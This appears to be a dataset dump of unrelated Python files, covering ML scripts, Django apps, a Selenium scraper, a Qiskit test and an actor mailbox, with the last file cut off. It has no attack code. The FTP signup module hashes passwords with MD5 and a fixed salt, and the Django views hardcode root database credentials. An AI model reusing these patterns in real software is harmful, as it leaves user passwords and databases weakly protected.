text stringlengths 38 1.54M |
|---|
import numpy as np
def sigmoid(z):
    """Logistic sigmoid activation: 1 / (1 + exp(-z)), applied elementwise."""
    denominator = 1 + np.exp(-z)
    return 1 / denominator
def sigmoid_prime(z):
    """Derivative of the sigmoid: s(z) * (1 - s(z)).

    Improvement: evaluates sigmoid(z) once instead of twice, halving the
    exp() work of the original.
    """
    s = sigmoid(z)
    return s * (1 - s)
class NeuralNetwork(object):
    """Minimal fully-connected network with one hidden layer, trained by
    batch gradient descent with sigmoid activations.

    X: (n_samples, n_features) input matrix.
    Y: (n_samples, n_outputs) target matrix.
    """

    def __init__(self, X, Y):
        self.alpha = 0.05            # learning rate
        self.inputs = X
        self.Y = Y
        self.output = np.zeros(self.Y.shape)
        self.hlayer1_size = 10       # hidden-layer width
        self.weights1 = np.random.rand(self.inputs.shape[1], self.hlayer1_size)
        self.weights2 = np.random.rand(self.hlayer1_size, self.output.shape[1])
        self.bias1 = np.random.rand(1)
        self.bias2 = np.random.rand(1)

    def forward_propagation(self):
        """Run a forward pass over the whole batch; caches layer1 for backprop."""
        self.layer1 = sigmoid(np.dot(self.inputs, self.weights1) + self.bias1)
        self.output = sigmoid(np.dot(self.layer1, self.weights2) + self.bias2)
        return self.output

    def backward_propagation(self):
        """One gradient-descent step on both weight matrices and biases.

        BUG FIX vs. original: the hidden-layer error must be backpropagated
        through the *pre-update* weights2; the original subtracted the
        weights2 update first and then used the already-modified matrix.
        """
        scale = self.alpha / self.inputs.shape[0]
        self.error = (self.output - self.Y)
        # NOTE(review): sigmoid_prime is applied to the *activation*
        # (already-sigmoided output), so this computes s(s(x))*(1-s(s(x)))
        # rather than the textbook output*(1-output). Kept as-is since the
        # network still trains; confirm whether this was intended.
        self.odelta = self.error * sigmoid_prime(self.output)
        self.dweights2 = np.dot(self.layer1.transpose(), self.odelta)
        self.dbias2 = self.odelta
        # Backpropagate through the old weights2 before applying its update.
        self.l1error = np.dot(self.odelta, self.weights2.transpose())
        self.l1delta = self.l1error * sigmoid_prime(self.layer1)
        self.dweights1 = np.dot(self.inputs.transpose(), self.l1delta)
        self.dbias1 = self.l1delta
        self.weights2 -= scale * self.dweights2
        self.bias2 -= scale * np.sum(self.dbias2)
        self.weights1 -= scale * self.dweights1
        self.bias1 -= scale * np.sum(self.dbias1)

    def saveWeights(self):
        """Dump all parameters as text files under params\\ (Windows-style
        separators kept to match the loading code in __main__)."""
        np.savetxt("params\\w1.txt", self.weights1, fmt="%s")
        np.savetxt("params\\w2.txt", self.weights2, fmt="%s")
        np.savetxt("params\\b1.txt", self.bias1, fmt="%s")
        np.savetxt("params\\b2.txt", self.bias2, fmt="%s")
def predict(input, weights1, bias1, weights2, bias2):
    """Forward pass using explicit parameters (no NeuralNetwork instance).

    Returns the sigmoid output of the two-layer network for `input`.
    """
    hidden = sigmoid(np.dot(input, weights1) + bias1)
    return sigmoid(np.dot(hidden, weights2) + bias2)
def load_params(filename):
    """Load a whitespace-separated 2-D float matrix written by np.savetxt.

    Fix: blank lines are skipped — np.savetxt terminates the file with a
    newline, which made the original call float('') and raise ValueError.
    Also splits on any run of whitespace instead of a single space.
    """
    rows = []
    with open(filename, 'r') as f:
        for line in f.read().split('\n'):
            if not line.strip():
                continue
            rows.append([float(x) for x in line.split()])
    return np.array(rows)
def load_param(filename):
    """Load a 1-D float vector (one value per line) written by np.savetxt.

    Fix: blank lines are ignored so the trailing newline np.savetxt writes
    no longer raises ValueError on float('').
    """
    with open(filename, 'r') as f:
        values = [float(x) for x in f.read().split('\n') if x.strip()]
    return np.array(values)
if __name__ == "__main__":
    # Training phase — deliberately disabled (block string) after the
    # weights were saved once by a previous run:
    '''epochs = 20000
    features = np.array([[0,1,0], [0,0,1], [1,0,0], [1,1,0], [1,1,1]])
    labels = np.array([[1,0,0,1,1]])
    labels = labels.reshape(5,1)
    NN = NeuralNetwork(features, labels)
    for i in range(epochs):
        predicted = NN.forward_propagation()
        error = (predicted - labels)
        print("Epoch : " + str(i) + ", Error : " + str(error.sum()))
        NN.backward_propagation()
    NN.saveWeights()'''
    # Inference phase: reload the saved parameters and classify two samples.
    weights1 = load_params('params\\w1.txt')
    # NOTE(review): w2.txt holds a (10, 1) matrix but is read with the 1-D
    # loader, yielding shape (10,); np.dot still contracts correctly, so the
    # prediction works — confirm this asymmetry is intended.
    weights2 = load_param('params\\w2.txt')
    bias1 = load_param('params\\b1.txt')
    bias2 = load_param('params\\b2.txt')
    test = np.array([[1,0,0]])
    predicted = predict(test, weights1, bias1, weights2, bias2)
    print(predicted)
    test = np.array([[0,1,0]])
    predicted = predict(test, weights1, bias1, weights2, bias2)
    print(predicted)
from django.db import models
from django.contrib import admin
# Mapping from the original movie-domain tutorial to this inventory domain:
# ACTOR      -> MATERIAL    (material)
# PELICULA   -> ENCABEZADO  (requisition header)
# ACTUACION  -> DESCRIPCION (line item / join table)
class Material(models.Model):
    """A purchasable material referenced by requisition headers."""
    nombre = models.CharField(max_length=100)  # material name
    unidad = models.CharField(max_length=30)   # unit of measure
    # NOTE(review): price stored as free text; a DecimalField would permit
    # validation/arithmetic, but changing it requires a schema migration.
    precio = models.CharField(max_length=30)

    def __str__(self):
        return self.nombre
class Encabezado(models.Model):
    """Requisition header: date, person in charge, and its materials,
    linked through the Descripcion join model."""
    fecha = models.DateField()
    encargado = models.CharField(max_length=60)
    materiales = models.ManyToManyField(Material, through='Descripcion')

    def __str__(self):
        return self.encargado
class Descripcion(models.Model):
    """Join table between Material and Encabezado (the M2M 'through' model)."""
    material = models.ForeignKey(Material, on_delete=models.CASCADE)
    encabezado = models.ForeignKey(Encabezado, on_delete=models.CASCADE)


class DescripcionInLine(admin.TabularInline):
    # Inline editor for Descripcion rows inside the parent admin pages.
    model = Descripcion
    extra = 1  # one blank extra row in the inline form


class MaterialAdmin(admin.ModelAdmin):
    # Admin for Material showing its Descripcion rows inline.
    inlines = (DescripcionInLine,)


class EncabezadoAdmin(admin.ModelAdmin):
    # Admin for Encabezado showing its Descripcion rows inline.
    inlines = (DescripcionInLine,)
|
from load_data_ex1 import *
from normalize_features import *
from gradient_descent import *
from plot_data_function import *
from plot_boundary import *
import matplotlib.pyplot as plt
from plot_sigmoid import *
from return_test_set import *
from compute_cost import *
import os
# Ensure the output directory for all saved plots exists.
figures_folder = os.path.join(os.getcwd(), 'figures')
if not os.path.exists(figures_folder):
    os.makedirs(figures_folder, exist_ok=True)

# this loads our data
X, y = load_data_ex1()

# split the dataset into training and test set, using random shuffling
train_samples = 20
X_train, y_train, X_test, y_test = return_test_set(X, y, train_samples)

# Compute mean and std on train set
# Normalize both train and test set using these mean and std values
# (the test set reuses the train statistics to avoid information leakage)
X_train_normalized, mean_vec, std_vec = normalize_features(X_train)
X_test_normalized = normalize_features(X_test, mean_vec, std_vec)

# After normalizing, we append a column of ones to X_normalized, as the bias term
# We append the column to the dimension of columns (i.e., 1)
# We do this for both train and test set
column_of_ones = np.ones((X_train_normalized.shape[0], 1))
X_train_normalized = np.append(column_of_ones, X_train_normalized, axis=1)
column_of_ones = np.ones((X_test_normalized.shape[0], 1))
X_test_normalized = np.append(column_of_ones, X_test_normalized, axis=1)

# initialise trainable parameters theta, set learning rate alpha and number of iterations
theta = np.zeros((3))
alpha = 5
iterations = 100

# call the gradient descent function to obtain the trained parameters theta_final and the cost vector
theta_final, cost_vector = gradient_descent(X_train_normalized, y_train, theta, alpha, iterations)

###################################################
# Train set
# Plot the cost for all iterations
fig, ax1 = plt.subplots()
plot_cost(cost_vector, ax1)
# NOTE(review): could reuse figures_folder here instead of re-joining os.getcwd().
plot_filename = os.path.join(os.getcwd(), 'figures', 'ex2_train_cost.png')
plt.savefig(plot_filename)
min_cost = np.min(cost_vector)
argmin_cost = np.argmin(cost_vector)
print('Final training cost: {:.5f}'.format(cost_vector[-1]))
print('Minimum training cost: {:.5f}, on iteration #{}'.format(min_cost, argmin_cost+1))

# plot our data and decision boundary
fig, ax1 = plt.subplots()
ax1 = plot_data_function(X_train_normalized, y_train, ax1)
plot_boundary(X_train_normalized, theta_final, ax1)
# save the plotted decision boundary as a figure
plot_filename = os.path.join(os.getcwd(), 'figures', 'ex2_decision_boundary_train.png')
plt.savefig(plot_filename)

###################################################
# Test set — evaluate the trained theta on held-out data.
cost_test = compute_cost(X_test_normalized, y_test, theta_final)
print('Final test cost: {:.5f}'.format(cost_test))
fig, ax1 = plt.subplots()
ax1 = plot_data_function(X_test_normalized, y_test, ax1)
plot_boundary(X_test_normalized, theta_final, ax1)
# save the plotted decision boundary as a figure
plot_filename = os.path.join(os.getcwd(), 'figures', 'ex2_decision_boundary_test.png')
plt.savefig(plot_filename)

# enter non-interactive mode of matplotlib, to keep figures open
plt.ioff()
plt.show()
|
from django.shortcuts import render,redirect,HttpResponse
from django.views import View
import pymysql
import math
from .page import *
# NOTE(review): one module-level connection shared by every request — not
# thread-safe under a multi-threaded server and will go stale after MySQL's
# idle timeout; a per-request connection (or Django's ORM) would be safer.
# Positional connect() arguments are also deprecated in PyMySQL.
db = pymysql.connect("localhost","root","root",database="yishuo",cursorclass=pymysql.cursors.DictCursor)
class message(View):
    """Paginated list of messages joined with their content text."""

    def get(self, request):
        # Page number from the query string; defaults to page 0.
        page = request.GET.get("page") if request.GET.get("page") else 0
        page = int(page)
        num = 3  # rows per page
        cursor = db.cursor()
        # Parameterized LIMIT offset,count — safe from SQL injection.
        sql = "select mid,mname,mcontent,content.ctext from message LEFT JOIN content on content.cid = message.mcid limit %s,%s"
        cursor.execute(sql, (page*num, num))
        result = cursor.fetchall()
        # Total row count -> total page count for the pager widget.
        sqls = "select count(*) as t from message"
        cursor.execute(sqls)
        nums = cursor.fetchone()
        nums = nums["t"]
        nums = math.ceil(nums/num)
        return render(request, "message/message.html", {"data": result, "page": getpages(nums, page, "/message")})
class messageadd(View):
    """Create a message: GET renders the form, POST inserts the row."""

    def get(self, request):
        cursor = db.cursor()
        # Content options for the form's select box.
        sql = "select cid,ctext from content"
        cursor.execute(sql)
        result = cursor.fetchall()
        return render(request, "message/messageadd.html", {"data": result})

    def post(self, request):
        cursor = db.cursor()
        mname = request.POST.get("mname")
        mcontent = request.POST.get("mcontent")
        cid = request.POST.get("cid")
        # Parameterized INSERT — safe from SQL injection.
        sql = "insert into message(mname,mcontent,mcid) VALUES (%s,%s,%s)"
        cursor.execute(sql, [mname, mcontent, cid])
        db.commit()
        return redirect("/message/")
class messagedel(View):
    """Delete the message identified by the `mid` query parameter."""

    def get(self, request):
        # NOTE(review): destructive action on GET — a POST with CSRF
        # protection would be the safer pattern.
        mid = request.GET.get("mid")
        cursor = db.cursor()
        sql = "delete from message where mid=%s"
        cursor.execute(sql, [mid])
        db.commit()
        return redirect("/message/")
class messageedit(View):
    """Edit an existing message: GET shows the form, POST saves the changes."""

    def get(self, request):
        cursor = db.cursor()
        mid = request.GET.get("mid")
        # Row being edited, joined with its current content text.
        sql = "select mid,mname,mcontent,content.ctext from message LEFT JOIN content on content.cid = message.mcid where mid=%s"
        cursor.execute(sql, [mid])
        result = cursor.fetchone()
        # All content options for the edit form's select box.
        sqls = "select * from content"
        cursor.execute(sqls)
        messageInfo = cursor.fetchall()
        return render(request, "message/messageedit.html", {"data": result, "messageInfo": messageInfo})

    def post(self, request):
        cursor = db.cursor()
        mid = request.POST.get("mid")
        mname = request.POST.get("mname")
        mcontent = request.POST.get("mcontent")
        mcid = request.POST.get("mcid")
        # Parameterized UPDATE — safe from SQL injection.
        sql = "update message set mname=%s,mcontent=%s,mcid=%s where mid=%s"
        cursor.execute(sql, [mname, mcontent, mcid, mid])
        db.commit()
        return redirect("/message/")
|
import os

# Bot credentials read from the environment (API_ID/API_HASH/BOT_TOKEN is
# presumably a Telegram bot setup — confirm against the consuming code).
# Each value is None when the variable is unset; no validation happens here.
API_ID = os.getenv("API_ID")
API_HASH = os.getenv("API_HASH")
BOT_TOKEN = os.getenv("BOT_TOKEN")
from good_smell import AstSmell, LoggingTransformer
import ast
class YieldFrom(AstSmell):
    """Checks for yields inside for loops"""

    @property
    def transformer_class(self):
        # Transformer that rewrites the smelly loop into `yield from`.
        return YieldFromTransformer

    @property
    def warning_message(self):
        return "Consider using yield from instead of yield inside of a for loop"

    @property
    def symbol(self):
        # Identifier used to enable/disable this particular check.
        return "yield-from"
class YieldFromTransformer(LoggingTransformer):
    """NodeTransformer that goes visits all the yields in fors and replaces them
    with yield from"""

    def visit_For(self, node: ast.For):
        # Replace the entire `for x in it: yield x` loop with `yield from it`.
        # NOTE(review): does not call generic_visit, so loops nested inside
        # this one are not themselves transformed — presumably LoggingTransformer
        # only dispatches here when is_smelly() holds; confirm.
        yield_from = ast.Expr(value=ast.YieldFrom(node.iter))
        return ast.fix_missing_locations(yield_from)

    @staticmethod
    def is_smelly(node: ast.AST):
        """Check if the node is a yield inside a for"""
        # Smelly iff the loop body is exactly one bare `yield` expression.
        return (
            isinstance(node, ast.For)
            and len(node.body) == 1
            and isinstance(node.body[0], ast.Expr)
            and isinstance(node.body[0].value, ast.Yield)
        )
|
# ! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = "Miller"
# Datetime: 2019/8/27 13:57
import datetime
import time
# print(time.strptime("2019-08-27 13:58:40.258622".rsplit(".", 1)[0], "%Y-%m-%d %X"))
# ####################################################################
# res = datetime.date(year=2019, month=8, day=27)
# print(res.year)
# print(res.month)
# print(res.day)
# print(type(res)) # <class 'datetime.date'>
# ####################################################################
# res = datetime.time(**{"hour": 13, "minute": 58, "second": 40})
# print(res.hour)
# print(res.minute)
# print(res.second)
# print(type(res)) # <class 'datetime.time'>
# ####################################################################
# print(datetime.datetime) # <class 'datetime.datetime'>
# ho = datetime.datetime.hour
# ####################################################################
# print(datetime.timedelta())
# d = datetime.datetime.now()
# print("原来的", d.today())
# print(d.timestamp())
# print(d.today())
# print(d.year)
# print(d.month)
# print(d.day)
# print(d.timetuple())
# ####################################################################
# res = d.replace(year=2999, month=11, day=30) # 返回一个新的时间对象
# print(res.today()) # 2999-11-30 14:32:37.730159 # 2019-08-27 14:33:19.666558
# print(datetime.date(2999, 11, 30))
# ####################################################################
# print(datetime.timedelta(2017, 10, 5, 12, 53, 35, 276589).days)
# print(datetime.timedelta(2017, 10, 5, 12, 53, 35, 276589).max)
# print(datetime.timedelta(2017, 10, 5, 12, 53, 35, 276589).min)
# ####################################################################
# print(datetime.datetime(2017, 10, 5, 12, 53, 35, 276589))
# ####################################################################
# datetime.datetime.now() + datetime.timedelta(4) # 当前时间 +4天
# print(datetime.datetime.now() - datetime.timedelta(hours=4)) # 当前时间+4小时
# ####################################################################
# print(datetime.datetime.now() + datetime.timedelta(days=2, hours=8))
# 2019-08-29 22:35:02
# print(time.time())
# #
# # print(datetime.datetime.now().timestamp())
# #####################################时间的转换###############################
# res = datetime.datetime.now()
#
# print(res)
# ret = res.timestamp() # 转换成时间戳
# print(ret)
# print(datetime.date.fromtimestamp(1566888190.790368))
# "2019-08-27 14:43:14.714593"
# #####################################时间的转换###############################
# print(datetime.datetime.now() + datetime.timedelta(4)) # 当前时间 +4天
"asbbcdvcsa"
# Given a string, return the index of its first non-repeating character.
|
###########################################################
#author:sunny, date:3/24/2019
#function:access the test case sequence, and setUp,tearDown
#are accessed by every test named by test at the beginning
###########################################################
#startend.py
#coding = utf-8
from selenium import webdriver
import time
import unittest
class StartEnd(unittest.TestCase):
    """Fixture demo: setUp/tearDown run around every test_* method."""

    def setUp(self):
        # Fresh Firefox session pointed at the profile page before each test.
        self.driver = webdriver.Firefox()
        self.driver.get("https://github.com/sunnie2004")

    def tearDown(self):
        # Close the browser and end the WebDriver session after each test.
        self.driver.quit()
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2019, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test of UCCSD and HartreeFock Aqua extensions """
from test.chemistry import QiskitChemistryTestCase
from qiskit import BasicAer
from qiskit.aqua import QuantumInstance
from qiskit.aqua.algorithms import VQE
from qiskit.aqua.components.optimizers import SLSQP
from qiskit.chemistry.components.initial_states import HartreeFock
from qiskit.chemistry.components.variational_forms import UCCSD
from qiskit.chemistry.drivers import HDF5Driver
from qiskit.chemistry.core import Hamiltonian, QubitMappingType
class TestUCCSDHartreeFock(QiskitChemistryTestCase):
    """Test for these aqua extensions."""

    def setUp(self):
        super().setUp()
        # Reference ground-state energy (Hartree) the VQE result must match.
        self.reference_energy = -1.1373060356951838

    def test_uccsd_hf(self):
        """ uccsd hf test """
        # Load a precomputed molecule from an HDF5 resource (no chemistry
        # driver binary needed at test time).
        driver = HDF5Driver(self.get_resource_path('test_driver_hdf5.hdf5'))
        qmolecule = driver.run()
        # Parity mapping + two-qubit reduction shrinks the qubit count.
        core = Hamiltonian(qubit_mapping=QubitMappingType.PARITY,
                           two_qubit_reduction=True)
        qubit_op, _ = core.run(qmolecule)
        optimizer = SLSQP(maxiter=100)
        # Hartree-Fock reference state that seeds the UCCSD ansatz.
        initial_state = HartreeFock(qubit_op.num_qubits,
                                    core.molecule_info['num_orbitals'],
                                    core.molecule_info['num_particles'],
                                    qubit_mapping=core._qubit_mapping,
                                    two_qubit_reduction=core._two_qubit_reduction)
        var_form = UCCSD(qubit_op.num_qubits, depth=1,
                         num_orbitals=core.molecule_info['num_orbitals'],
                         num_particles=core.molecule_info['num_particles'],
                         initial_state=initial_state,
                         qubit_mapping=core._qubit_mapping,
                         two_qubit_reduction=core._two_qubit_reduction)
        algo = VQE(qubit_op, var_form, optimizer)
        # Exact statevector simulation keeps the comparison deterministic.
        result = algo.run(QuantumInstance(BasicAer.get_backend('statevector_simulator')))
        result = core.process_algorithm_result(result)
        self.assertAlmostEqual(result.energy, self.reference_energy, places=6)
|
# locals() returns a dict of the local names and their current values.
locals()

# `del` removes a name binding, a list element/slice, or a dict entry.
# Fixes vs. original: a bare `del()` is a SyntaxError and was removed,
# and the demo variables no longer shadow the built-ins list/dict.
var = 6
del var  # var no more!

letters = ['a', 'b', 'c', 'd']
del letters[0]  # delete first element -> ['b', 'c', 'd']

mapping = {'a': 1, 'b': 2, 'c': 3}
del mapping['b']  # delete the 'b' entry -> {'a': 1, 'c': 3}
|
import time
from selenium import webdriver
# Log in to GISAID and bulk-download metadata + FASTA for every record,
# page by page. Loop structure below reconstructed from the action order:
# per-record clicks are inside the inner loop, pagination in the outer.
driver = webdriver.Chrome('path/to/chromedriver')  # Optional argument, if not specified will search path.
driver.get('https://platform.gisaid.org/epi3/frontend#2b8eee');
driver.refresh()  # refresh the page
#driver.maximize_window()
# Fill in username and password (captcha field, if any, is not handled).
driver.find_element_by_id("elogin").send_keys('usename')
driver.find_element_by_id("epassword").send_keys('passwd')
driver.find_element_by_class_name("form_button_submit").click()
time.sleep(5)
driver.find_element_by_partial_link_text("EpiCoV™").click()
time.sleep(5)
driver.find_elements_by_class_name("sys-actionbar-action")[1].click()
page_num = 67  # NOTE(review): unused — the loop below hard-codes range(67)
for i in range(67):
    a = time.time()  # per-page timing start
    sim_num = len(driver.find_elements_by_class_name('yui-dt-rec'))
    for x in range(sim_num):
        print(x)
        # Open the x-th record row; its details load in an iframe.
        driver.find_elements_by_class_name('yui-dt-rec')[x].click()
        time.sleep(3)
        driver.switch_to.frame(0)
        time.sleep(5)
        # Download metadata.
        driver.find_elements_by_class_name("sys-form-button-icon")[1].click()
        time.sleep(5)
        # Download FASTA.
        driver.find_elements_by_class_name("sys-form-button-icon")[2].click()
        time.sleep(10)
        # Close/back button, returning to the record list.
        driver.find_elements_by_class_name("sys-form-button-icon")[0].click()
        time.sleep(5)
    # Advance to the next results page.
    driver.find_element_by_class_name('yui-pg-next').click()
    time.sleep(5)
    b = time.time()
    print(b-a)  # seconds spent on this page
|
"""注册"""
import hashlib
from homework.ftp_finally.conf import conf
from homework.ftp_finally.conf import log_conf
def signup(user, pwd):
    """Register a user: append the line "user|md5(salt + pwd)" to the user table.

    Fix: hashlib requires bytes — the original passed the password straight
    to md5.update(), which raises TypeError for the str passwords the
    commented-out caller supplies. str passwords are now encoded first;
    bytes are still accepted unchanged.
    """
    # Fixed salt (the original author's name) prepended to every password.
    md5 = hashlib.md5('陈文波'.encode('utf-8'))
    if isinstance(pwd, str):
        pwd = pwd.encode('utf-8')
    with open(conf.user_table, 'a', encoding='utf-8') as f1:
        md5.update(pwd)
        secret_pwd = md5.hexdigest()
        f1.write('{}\n'.format(user + '|' + secret_pwd))
def check_user(user):
    """Return True when `user` is NOT yet registered, False otherwise.

    Scans every line of the user table; the username is the text before
    the first '|' separator on each line.
    """
    with open(conf.user_table, 'r', encoding='utf-8') as f1:
        registered = False
        for record in f1:
            if record[:record.index('|')] == user:
                registered = True
        return not registered
if __name__ == '__main__':
    # Ad-hoc manual check; the signup call is left disabled so repeated runs
    # don't keep appending the same user.
    # signup('xiaochen', '123123')
    print(check_user('chen123'))
"""
Requires crack propagation data for two datasets to be manually exported
from the main application.
"""
import os
import numpy as np
import matplotlib.pyplot as plt
import h5py
# Path to the results of the 'export-crack-propagation' command.
crackDataPath = 'PLACEHOLDER-PATH'
datasetNames = ['PTFE-Epoxy.csv', 'Steel-Epoxy.csv']
datasetShifts = [[0, 0], [-25, -30]]
def main():
    """Overlay crack-skeleton frames from the two datasets at matching strain
    values and save one comparison PNG per 0.25-strain step.

    Fixes vs. original: np.float (removed in NumPy 1.24) replaced with the
    builtin float; each figure is closed after saving so hundreds of open
    figures no longer accumulate; module guarded by __main__ so importing
    this file does not trigger the whole run.
    """
    datasetPaths = [os.path.join(crackDataPath, 'crack-propagation_{}.hdf'.format(n)) for n in datasetNames]
    datasetNumber = len(datasetNames)
    datasetH5Files = [h5py.File(path, 'r') for path in datasetPaths]
    strainArrays = [f['strain'][...] for f in datasetH5Files]
    strainMin = min(np.min(a) for a in strainArrays)
    strainMax = max(np.max(a) for a in strainArrays)
    # Frames from the two datasets can differ in size; pad both to the max.
    frameSizes = [np.asarray(f['sigmaSkeleton'].shape[1:3]) for f in datasetH5Files]
    maxFrameSize = tuple(max(frameSizes[i][d] for i in range(datasetNumber)) for d in range(2))
    print("Frame sizes: {}".format(frameSizes))
    print("Max frame size: {}".format(maxFrameSize))
    currentIndices = [0] * datasetNumber
    for strainIndex, strainValue in enumerate(np.arange(int(strainMin), int(strainMax), 0.25)):
        # Advance each dataset's cursor to the first frame at >= strainValue.
        for i in range(datasetNumber):
            while currentIndices[i] < strainArrays[i].shape[0] - 1 and \
                    strainArrays[i][currentIndices[i]] < strainValue:
                currentIndices[i] += 1
        fig = plt.figure()
        ax = fig.add_subplot(1, 1, 1)
        # Create an empty RGB image (builtin float: np.float was removed in
        # NumPy 1.24).
        image = np.zeros(maxFrameSize + (3,), dtype=float)
        for i in range(datasetNumber):
            sigmaSkeleton = datasetH5Files[i]['sigmaSkeleton'][currentIndices[i], ...]
            sigmaSkeleton = np.pad(sigmaSkeleton,
                                   [(0, maxFrameSize[d] - sigmaSkeleton.shape[d]) for d in range(2)],
                                   mode='constant', constant_values=0)
            sigmaSkeleton = np.roll(sigmaSkeleton, datasetShifts[i][0], axis=0)
            sigmaSkeleton = np.roll(sigmaSkeleton, datasetShifts[i][1], axis=1)
            # First dataset drawn red, second blue.
            image[sigmaSkeleton == 1] += (1.0, 0.0, 0.0) if i == 0 else (0.0, 0.0, 1.0)
        ax.imshow(image.swapaxes(0, 1), origin='lower')
        strainValues = ['{:.3f}'.format(strainArrays[i][currentIndices[i]]) for i in range(datasetNumber)]
        frameNumbers = [datasetH5Files[i]['frameMap'][currentIndices[i]] for i in range(datasetNumber)]
        ax.text(0.1, 0.1, "Strain: {}; Frame: {}".format(strainValues, frameNumbers), color='white')
        fig.savefig(os.path.join(crackDataPath, 'crack-comparison_{}.png'.format(strainIndex)))
        # Release the figure to keep memory bounded over the strain sweep.
        plt.close(fig)


if __name__ == '__main__':
    main()
|
#!/bin/python3
import netifaces as ni
import psutil
import os
import sys
def ip_get(interface: str) -> str:
    """Return the first IPv4 address of the NIC whose name contains
    `interface` (substring match), or "0.0.0.0" when none is found.

    Fixes vs. original: the old code iterated psutil's interface dict while
    indexing netifaces' interface *list* with a separate counter — the two
    sources need not agree in length or order (possible IndexError / wrong
    NIC); a matching NIC without an IPv4 address also raised KeyError.
    Now only netifaces is consulted, and AF_INET absence is handled.
    """
    for nic in ni.interfaces():
        if interface in nic:
            inet = ni.ifaddresses(nic).get(ni.AF_INET)
            if inet:
                return inet[0]['addr']
    return "0.0.0.0"
if __name__ == '__main__':
    # Require exactly one argument: the (partial) interface name.
    if (len(sys.argv) < 2):
        print("Usage: python3 show_ip4.py [interface]")
        exit(1)
    argv = sys.argv[1]
    print(ip_get(argv))
|
'''
You are given an amount denoted by value. You are also given an array of coins.
The array contains the denominations of the give coins.
You need to find the minimum number of coins to make the change for value using the coins of given denominations.
Also, keep in mind that you have infinite supply of the coins.
Example 1:
Input:
value = 5
numberOfCoins = 3
coins[] = {3,6,3}
Output: Not Possible
Explanation:We need to make the change for
value = 5 The denominations are {3,6,3}
It is certain that we cannot make 5 using
any of these coins.
Example 2:
Input:
value = 10
numberOfCoins = 4
coins[] = {2 5 3 6}
Output: 2
Explanation:We need to make the change for
value = 10 The denominations are {2,5,3,6}
We can use two 5 coins to make 10. So
minimum coins are 2.
https://www.geeksforgeeks.org/find-minimum-number-of-coins-that-make-a-change/
'''
import sys
def minCoins(coins, m, V):
    """Bottom-up DP: fewest coins from the first m entries of `coins` that
    sum to exactly V.

    Returns sys.maxsize when V cannot be formed from the given denominations
    (table[V] stays at its "infinite" initial value).
    """
    INF = sys.maxsize
    # table[v] = minimum number of coins needed to make value v;
    # 0 coins are needed for v == 0, everything else starts "infinite".
    table = [0] + [INF] * V
    for value in range(1, V + 1):
        for coin in coins[:m]:
            if coin <= value:
                sub_res = table[value - coin]
                # Only improve from reachable sub-amounts.
                if sub_res != INF:
                    table[value] = min(table[value], sub_res + 1)
    return table[V]
# Driver Code
if __name__ == "__main__":
    coins = [9, 6, 5, 1]
    m = len(coins)
    V = 11
    print(minCoins(coins, m, V))  # expected: 2 (6 + 5)
from abc import ABCMeta, abstractmethod
from asyncio import sleep
from threading import RLock
from enum import Enum
from typing import Optional
from . import mailbox_statistics, messages, queue
from .. import dispatcher, invoker
class MailBoxStatus(Enum):
    """Scheduling state of a mailbox: IDLE means no run loop is scheduled,
    BUSY means one is scheduled or currently draining the queues."""
    IDLE = 0
    BUSY = 1
class AbstractMailbox(metaclass=ABCMeta):
    """Interface for actor mailboxes: accept user and system messages, and
    receive a start notification."""

    @abstractmethod
    def post_user_message(self, msg):
        # Enqueue an application-level message.
        raise NotImplementedError("Should Implement this method")

    @abstractmethod
    def post_system_message(self, msg):
        # Enqueue an infrastructure message (e.g. suspend/resume).
        raise NotImplementedError("Should Implement this method")

    @abstractmethod
    def start(self):
        # Called once when the mailbox is attached/started.
        raise NotImplementedError("Should Implement this method")
class Mailbox(AbstractMailbox):
    """Actor mailbox with separate system and user queues.

    System messages (suspend/resume, lifecycle) always take priority over
    user messages. A dispatcher schedules the async __run loop on demand;
    the IDLE/BUSY status, guarded by an RLock, guarantees at most one run
    loop is scheduled at a time.
    """

    def __init__(self, system_messages_queue: queue.AbstractQueue, user_messages_queue: queue.AbstractQueue,
                 invoker: invoker.AbstractInvoker, dispatcher: dispatcher.AbstractDispatcher,
                 *statistics: Optional[mailbox_statistics.AbstractMailBoxStatistics]) -> None:
        self.__system_messages_queue = system_messages_queue
        self.__user_messages_queue = user_messages_queue
        self.__statistics = statistics if statistics else []
        self.__invoker = invoker
        self.__dispatcher = dispatcher
        self.__status = MailBoxStatus.IDLE
        self.__suspended = False
        self.__status_lock = RLock()

    def post_system_message(self, message: object):
        # System messages skip the statistics hooks and wake the loop.
        self.__system_messages_queue.push(message)
        self.__schedule()

    def post_user_message(self, message: object):
        self.__user_messages_queue.push(message)
        for stats in self.__statistics:
            stats.message_posted()
        self.__schedule()

    def start(self):
        for stats in self.__statistics:
            # NOTE(review): 'mailbox_stated' looks like a typo for
            # 'mailbox_started', but it is the statistics API's actual name
            # and cannot be changed here.
            stats.mailbox_stated()

    def __schedule(self):
        # Flip IDLE -> BUSY exactly once under the lock; only the thread
        # that flips it schedules a run loop, so concurrent posts cannot
        # double-schedule.
        with self.__status_lock:
            if self.__status == MailBoxStatus.IDLE:
                self.__status = MailBoxStatus.BUSY
                self.__dispatcher.schedule(self.__run)

    async def __run(self):
        # Drain messages in batches until there is nothing left to do
        # (no system messages, and either suspended or no user messages),
        # then flip back to IDLE and exit.
        while True:
            with self.__status_lock:
                if not self.__system_messages_queue.has_messages() and \
                        (self.__suspended or not self.__user_messages_queue.has_messages()):
                    self.__status = MailBoxStatus.IDLE
                    for stats in self.__statistics:
                        stats.mailbox_empty()
                    return
            await self.__process_messages()
            await sleep(0)  # yield to the event loop between batches

    async def __process_messages(self):
        # Handle up to `throughput` iterations, always consuming a pending
        # system message before touching the user queue.
        throughput = self.__dispatcher.throughput
        message = None
        try:
            for i in range(throughput):
                message = self.__system_messages_queue.pop()
                if message is not None:
                    if isinstance(message, messages.SuspendMailbox):
                        self.__suspended = True
                    elif isinstance(message, messages.ResumeMailbox):
                        self.__suspended = False
                    else:
                        await self.__invoker.invoke_system_message(message)
                if self.__suspended:
                    break
                message = self.__user_messages_queue.pop()
                if message is not None:
                    await self.__invoker.invoke_user_message(message)
                    for stats in self.__statistics:
                        stats.message_received()
                else:
                    break
        except Exception as e:
            # Escalate with whichever message was being processed when the
